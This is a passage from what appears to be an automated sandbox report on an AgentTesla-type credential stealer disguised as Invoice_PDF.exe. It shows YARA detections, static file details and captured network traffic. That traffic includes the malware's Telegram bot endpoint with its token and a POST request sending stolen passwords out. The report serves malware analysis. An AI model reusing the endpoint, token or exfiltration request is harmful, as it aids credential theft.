http://www.fontbureau.comoitu | Invoice_PDF.exe, 00000000.00000002.275871817.0000000001717000.00000004.00000040.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/ | Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://87HMfkdDwCo1wEm.org | Invoice_PDF.exe, 00000003.00000002.527180057.00000000035A0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.como | Invoice_PDF.exe, 00000000.00000002.275871817.0000000001717000.00000004.00000040.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.comgrito | Invoice_PDF.exe, 00000000.00000002.275871817.0000000001717000.00000004.00000040.sdmp | false | URL Reputation: safe | unknown
http://www.fonts.com | Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | false | | high
http://www.sandoll.co.kr | Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://api.telegram.org | Invoice_PDF.exe, 00000003.00000002.527261346.00000000035B9000.00000004.00000001.sdmp | false | | high
http://www.chinhdo.com | Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Invoice_PDF.exe, 00000003.00000002.527224881.00000000035A4000.00000004.00000001.sdmp | false | | high
http://www.sakkal.com | Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://87HMfkdDwCo1wEm.orgx | Invoice_PDF.exe, 00000003.00000002.527027069.000000000354C000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | Invoice_PDF.exe, 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp, Invoice_PDF.exe, 00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp, Invoice_PDF.exe, 00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/ | Invoice_PDF.exe, 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp, Invoice_PDF.exe, 00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp, Invoice_PDF.exe, 00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmp | false | | high

                                                        Contacted IPs


                                                        Public

IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false

                                                        General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 532735
Start date: 02.12.2021
Start time: 16:53:42
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 42s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Invoice_PDF.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/1@1/1
EGA Information: Failed
HDC Information:
• Successful, ratio: 0.3% (good quality ratio 0.1%)
• Quality average: 24.8%
• Quality standard deviation: 36.9%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time | Type | Description
16:54:51 | API Interceptor | 701x Sleep call for process: Invoice_PDF.exe modified

Joe Sandbox View / Context

IPs

Match: 149.154.167.220
Associated Sample Name / URL | SHA 256 | Detection | Link | Context
SWIFT_ADVICE.exe | Get hash | malicious | Browse | -
Overdue outstanding payment.exe | Get hash | malicious | Browse | -
proforma invoice packing list.exe | Get hash | malicious | Browse | -
KG236KQE0b.exe | Get hash | malicious | Browse | -
TT COPY.exe | Get hash | malicious | Browse | -
proforma invoice packing list.exe | Get hash | malicious | Browse | -
PROFORMA.EXE | Get hash | malicious | Browse | -
Proforma-Invoice CAC1105 CI&PL.exe | Get hash | malicious | Browse | -
8VVKoakLYt.exe | Get hash | malicious | Browse | -
SecuriteInfo.com.Trojan.GenericKD.47502835.19614.exe | Get hash | malicious | Browse | -
FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Get hash | malicious | Browse | -
Quote.exe | Get hash | malicious | Browse | -
Dhl delivery Express.exe | Get hash | malicious | Browse | -
stampa_CFS-ITALIA_1123311-655.exe | Get hash | malicious | Browse | -
Launcher.exe | Get hash | malicious | Browse | -
BANKASI 657090031.exe | Get hash | malicious | Browse | -
SecuriteInfo.com.Variant.Barys.226418.1879.exe | Get hash | malicious | Browse | -
SecuriteInfo.com.Trojan.GenericKD.38103794.11009.exe | Get hash | malicious | Browse | -
SecuriteInfo.com.Trojan.SpyBot.1125.26781.exe | Get hash | malicious | Browse | -
Emailing Swift.exe | Get hash | malicious | Browse | -

Domains

Match: api.telegram.org
Associated Sample Name / URL | SHA 256 | Detection | Link | Context
New Order4687334.exe | Get hash | malicious | Browse | 149.154.167.220
SWIFT_ADVICE.exe | Get hash | malicious | Browse | 149.154.167.220
Overdue outstanding payment.exe | Get hash | malicious | Browse | 149.154.167.220
proforma invoice packing list.exe | Get hash | malicious | Browse | 149.154.167.220
KG236KQE0b.exe | Get hash | malicious | Browse | 149.154.167.220
TT COPY.exe | Get hash | malicious | Browse | 149.154.167.220
Invoice.doc.scr.exe | Get hash | malicious | Browse | 149.154.167.220
proforma invoice packing list.exe | Get hash | malicious | Browse | 149.154.167.220
PROFORMA.EXE | Get hash | malicious | Browse | 149.154.167.220
Proforma-Invoice CAC1105 CI&PL.exe | Get hash | malicious | Browse | 149.154.167.220
8VVKoakLYt.exe | Get hash | malicious | Browse | 149.154.167.220
SecuriteInfo.com.Trojan.GenericKD.47502835.19614.exe | Get hash | malicious | Browse | 149.154.167.220
FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Get hash | malicious | Browse | 149.154.167.220
Quote.exe | Get hash | malicious | Browse | 149.154.167.220
Dhl delivery Express.exe | Get hash | malicious | Browse | 149.154.167.220
stampa_CFS-ITALIA_1123311-655.exe | Get hash | malicious | Browse | 149.154.167.220
Launcher.exe | Get hash | malicious | Browse | 149.154.167.220
BANKASI 657090031.exe | Get hash | malicious | Browse | 149.154.167.220
SecuriteInfo.com.Variant.Barys.226418.1879.exe | Get hash | malicious | Browse | 149.154.167.220
SecuriteInfo.com.Trojan.GenericKD.38103794.11009.exe | Get hash | malicious | Browse | 149.154.167.220

ASN

Match: TELEGRAMRU
Associated Sample Name / URL | SHA 256 | Detection | Link | Context
SWIFT_ADVICE.exe | Get hash | malicious | Browse | 149.154.167.220
Overdue outstanding payment.exe | Get hash | malicious | Browse | 149.154.167.220
proforma invoice packing list.exe | Get hash | malicious | Browse | 149.154.167.220
KG236KQE0b.exe | Get hash | malicious | Browse | 149.154.167.220
TT COPY.exe | Get hash | malicious | Browse | 149.154.167.220
proforma invoice packing list.exe | Get hash | malicious | Browse | 149.154.167.220
PROFORMA.EXE | Get hash | malicious | Browse | 149.154.167.220
Proforma-Invoice CAC1105 CI&PL.exe | Get hash | malicious | Browse | 149.154.167.220
8VVKoakLYt.exe | Get hash | malicious | Browse | 149.154.167.220
SecuriteInfo.com.Trojan.GenericKD.47502835.19614.exe | Get hash | malicious | Browse | 149.154.167.220
nkXzJnW7AH.exe | Get hash | malicious | Browse | 149.154.167.99
FedEx Shipment Notification - Air WayBill FED1007990_A10792.exe | Get hash | malicious | Browse | 149.154.167.220
Quote.exe | Get hash | malicious | Browse | 149.154.167.220
Dhl delivery Express.exe | Get hash | malicious | Browse | 149.154.167.220
stampa_CFS-ITALIA_1123311-655.exe | Get hash | malicious | Browse | 149.154.167.220
Launcher.exe | Get hash | malicious | Browse | 149.154.167.220
BANKASI 657090031.exe | Get hash | malicious | Browse | 149.154.167.220
SecuriteInfo.com.Variant.Barys.226418.1879.exe | Get hash | malicious | Browse | 149.154.167.220
SecuriteInfo.com.Trojan.GenericKD.38103794.11009.exe | Get hash | malicious | Browse | 149.154.167.220
SecuriteInfo.com.Trojan.SpyBot.1125.26781.exe | Get hash | malicious | Browse | 149.154.167.220

JA3 Fingerprints

Match: 3b5074b1b5d032e5620f69f9f700ff0e
Associated Sample Name / URL | SHA 256 | Detection | Link | Context
AegEywmjUJ.exe | Get hash | malicious | Browse | 149.154.167.220
3t9XLLs9ae.exe | Get hash | malicious | Browse | 149.154.167.220
mzSVrYKRrI.exe | Get hash | malicious | Browse | 149.154.167.220
SWIFT_ADVICE.exe | Get hash | malicious | Browse | 149.154.167.220
NOTIFICACION DE CITACION No. 0988-02043-2020. OFICINA DE TALENTO HUMANO.exe | Get hash | malicious | Browse | 149.154.167.220
DHL_119040 receipt document,pdf.exe | Get hash | malicious | Browse | 149.154.167.220
WK1CQtJu13.exe | Get hash | malicious | Browse | 149.154.167.220
SecuriteInfo.com.W32.AIDetect.malware1.19028.exe | Get hash | malicious | Browse | 149.154.167.220
support.Client.exe | Get hash | malicious | Browse | 149.154.167.220
ysNX6q4xm1.exe | Get hash | malicious | Browse | 149.154.167.220
YXD40hGJU8.exe | Get hash | malicious | Browse | 149.154.167.220
Orden de Compra -AR95647.exe | Get hash | malicious | Browse | 149.154.167.220
DHL Receipt Document,pdf.exe | Get hash | malicious | Browse | 149.154.167.220
Glory Hack.exe | Get hash | malicious | Browse | 149.154.167.220
GenshinHack.exe | Get hash | malicious | Browse | 149.154.167.220
Overdue outstanding payment.exe | Get hash | malicious | Browse | 149.154.167.220
proforma invoice packing list.exe | Get hash | malicious | Browse | 149.154.167.220
KG236KQE0b.exe | Get hash | malicious | Browse | 149.154.167.220
Gracehealthmi.org7X9YCEB6AI.htm | Get hash | malicious | Browse | 149.154.167.220
iXVF1Qz1k5.exe | Get hash | malicious | Browse | 149.154.167.220

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Invoice_PDF.exe.log
Process: C:\Users\user\Desktop\Invoice_PDF.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.355304211458859
Encrypted: false
SSDEEP: 24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5: FED34146BF2F2FA59DCF8702FCC8232E
SHA1: B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256: 123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512: 1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

Static File Info

General

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.900031011690095
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.80%
• Win32 Executable (generic) a (10002005/4) 49.75%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Windows Screen Saver (13104/52) 0.07%
• Generic Win/DOS Executable (2004/3) 0.01%
File name: Invoice_PDF.exe
File size: 584704
MD5: 1dcc43f272f66d8e5afe11e7276dd122
SHA1: cb6a88d1443e7cca944a4176e2a8ebc205f715e3
SHA256: 0c6a99b9327cbcb0f3c5b18bc93d347ec8adcb3686e562c515ee4388713e8ed7
SHA512: d3b4b4c93a0b1be2b3effe11e1a4db954f65dc9edf722310ee43defa5cecce6f717fc518b9735c71ef4fac53202c3d314ee6e7e0aab789bc881e4eab6e65a111
SSDEEP: 12288:iRyDALnKCZh9TgD29MIY9s0cWEq84Xs10/FKVKmyglGETvHrJrEvE:Yp/jTg6Kxs0cABXe0/Fu3/TlEM
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'..a..............0.................. ........@.. .......................@............@................................

File Icon

Icon Hash: 00828e8e8686b000

Static PE Info

General

Entrypoint: 0x48fe8e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x619DD327 [Wed Nov 24 05:52:39 2021 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al    (this line is repeated 97 times in the original preview: the bytes following the jump are all zero)

                                                                                                Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x8fe34          0x57          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x90000          0x610         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x92000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                                                Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
.text   0x2000           0x8de94       0x8e000   False     0.927531497579   data       7.91118342624   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0x90000          0x610         0x800     False     0.33984375       data       3.45406453385   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x92000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                Resources

Name         RVA      Size   Type                                                                        Language  Country
RT_VERSION   0x900a0  0x380  data
RT_MANIFEST  0x90420  0x1ea  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                                Imports

DLL          Import
mscoree.dll  _CorExeMain

                                                                                                Version Infos

Description       Data
Translation       0x0000 0x04b0
LegalCopyright    Real Estate LTD
Assembly Version  2.9.0.0
InternalName      OverlappedDa.exe
FileVersion       2.8.2.0
CompanyName       Buena Vista Realty Service
LegalTrademarks
Comments
ProductName       ObjectHolderList
ProductVersion    2.8.2.0
FileDescription   ObjectHolderList
OriginalFilename  OverlappedDa.exe

                                                                                                Network Behavior

                                                                                                Network Port Distribution

                                                                                                TCP Packets

Timestamp                           Source Port  Dest Port  Source IP        Dest IP
Dec 2, 2021 16:56:42.434241056 CET  49813        443        192.168.2.5      149.154.167.220
Dec 2, 2021 16:56:42.434289932 CET  443          49813      149.154.167.220  192.168.2.5
Dec 2, 2021 16:56:42.434371948 CET  49813        443        192.168.2.5      149.154.167.220
Dec 2, 2021 16:56:42.534015894 CET  49813        443        192.168.2.5      149.154.167.220
Dec 2, 2021 16:56:42.534053087 CET  443          49813      149.154.167.220  192.168.2.5
Dec 2, 2021 16:56:42.602024078 CET  443          49813      149.154.167.220  192.168.2.5
Dec 2, 2021 16:56:42.602269888 CET  49813        443        192.168.2.5      149.154.167.220
Dec 2, 2021 16:56:42.606867075 CET  49813        443        192.168.2.5      149.154.167.220
Dec 2, 2021 16:56:42.606899023 CET  443          49813      149.154.167.220  192.168.2.5
Dec 2, 2021 16:56:42.607336044 CET  443          49813      149.154.167.220  192.168.2.5
Dec 2, 2021 16:56:42.650398970 CET  49813        443        192.168.2.5      149.154.167.220
Dec 2, 2021 16:56:44.186492920 CET  49813        443        192.168.2.5      149.154.167.220
Dec 2, 2021 16:56:44.216207981 CET  443          49813      149.154.167.220  192.168.2.5
Dec 2, 2021 16:56:44.218369961 CET  49813        443        192.168.2.5      149.154.167.220
Dec 2, 2021 16:56:44.260874033 CET  443          49813      149.154.167.220  192.168.2.5
Dec 2, 2021 16:56:44.311028957 CET  443          49813      149.154.167.220  192.168.2.5
Dec 2, 2021 16:56:44.311120033 CET  443          49813      149.154.167.220  192.168.2.5
Dec 2, 2021 16:56:44.311306000 CET  49813        443        192.168.2.5      149.154.167.220
Dec 2, 2021 16:56:44.312737942 CET  49813        443        192.168.2.5      149.154.167.220

                                                                                                UDP Packets

Timestamp                           Source Port  Dest Port  Source IP    Dest IP
Dec 2, 2021 16:56:42.256400108 CET  55016        53         192.168.2.5  8.8.8.8
Dec 2, 2021 16:56:42.275835037 CET  53           55016      8.8.8.8      192.168.2.5

                                                                                                DNS Queries

Timestamp                           Source IP    Dest IP  Trans ID  OP Code             Name              Type            Class
Dec 2, 2021 16:56:42.256400108 CET  192.168.2.5  8.8.8.8  0x6c77    Standard query (0)  api.telegram.org  A (IP address)  IN (0x0001)

                                                                                                DNS Answers

Timestamp                           Source IP  Dest IP      Trans ID  Reply Code    Name              CName  Address          Type            Class
Dec 2, 2021 16:56:42.275835037 CET  8.8.8.8    192.168.2.5  0x6c77    No error (0)  api.telegram.org         149.154.167.220  A (IP address)  IN (0x0001)

                                                                                                HTTP Request Dependency Graph

                                                                                                • api.telegram.org

                                                                                                HTTPS Proxied Packets

Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
0           192.168.2.5  49813        149.154.167.220  443               C:\Users\user\Desktop\Invoice_PDF.exe

Timestamp                kBytes transferred  Direction  Data
2021-12-02 15:56:44 UTC  0                   OUT        POST /bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocument HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------8d9b5ce0c4c9d6d
Host: api.telegram.org
Content-Length: 1009
Expect: 100-continue
Connection: Keep-Alive
2021-12-02 15:56:44 UTC  0                   IN         HTTP/1.1 100 Continue
                                                                                                2021-12-02 15:56:44 UTC0OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 62 35 63 65 30 63 34 63 39 64 36 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 39 35 32 31 36 31 31 35 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 62 35 63 65 30 63 34 63 39 64 36 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 61 6c 66 6f 6e 73 2f 31 32 38 37 35 37 0a 4f 53 46 75 6c
                                                                                                Data Ascii: -----------------------------8d9b5ce0c4c9d6dContent-Disposition: form-data; name="chat_id"1952161154-----------------------------8d9b5ce0c4c9d6dContent-Disposition: form-data; name="caption"New PW Recovered!User Name: user/128757OSFul
2021-12-02 15:56:44 UTC  1                   IN         HTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0
                                                                                                Date: Thu, 02 Dec 2021 15:56:44 GMT
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 606
                                                                                                Connection: close
                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                {"ok":true,"result":{"message_id":442,"from":{"id":1900392974,"is_bot":true,"first_name":"UdLogzx","username":"UdLogzx_bot"},"chat":{"id":1952161154,"first_name":"John","last_name":"ju","type":"private"},"date":1638460604,"document":{"file_name":"user-128757 2021-12-02 07-57-32.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIBumGo7LwUeqe_8YHaAhGE1dXH7B9tAAIaEgACKbtIUf8qmO1rIsZlIgQ","file_unique_id":"AgADGhIAAim7SFE","file_size":437},"caption":"New PW Recovered!\n\nUser Name: user/128757\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                                                Code Manipulations

                                                                                                Statistics

                                                                                                Behavior


                                                                                                System Behavior

                                                                                                General

                                                                                                Start time:16:54:43
                                                                                                Start date:02/12/2021
                                                                                                Path:C:\Users\user\Desktop\Invoice_PDF.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\Invoice_PDF.exe"
                                                                                                Imagebase:0xb90000
                                                                                                File size:584704 bytes
                                                                                                MD5 hash:1DCC43F272F66D8E5AFE11E7276DD122
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                Reputation:low

                                                                                                General

                                                                                                Start time:16:54:52
                                                                                                Start date:02/12/2021
                                                                                                Path:C:\Users\user\Desktop\Invoice_PDF.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Users\user\Desktop\Invoice_PDF.exe
                                                                                                Imagebase:0xed0000
                                                                                                File size:584704 bytes
                                                                                                MD5 hash:1DCC43F272F66D8E5AFE11E7276DD122
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.519916492.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000002.519916492.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.272859935.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.272859935.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.273395534.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.273395534.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                Reputation:low

                                                                                                Disassembly

                                                                                                Code Analysis
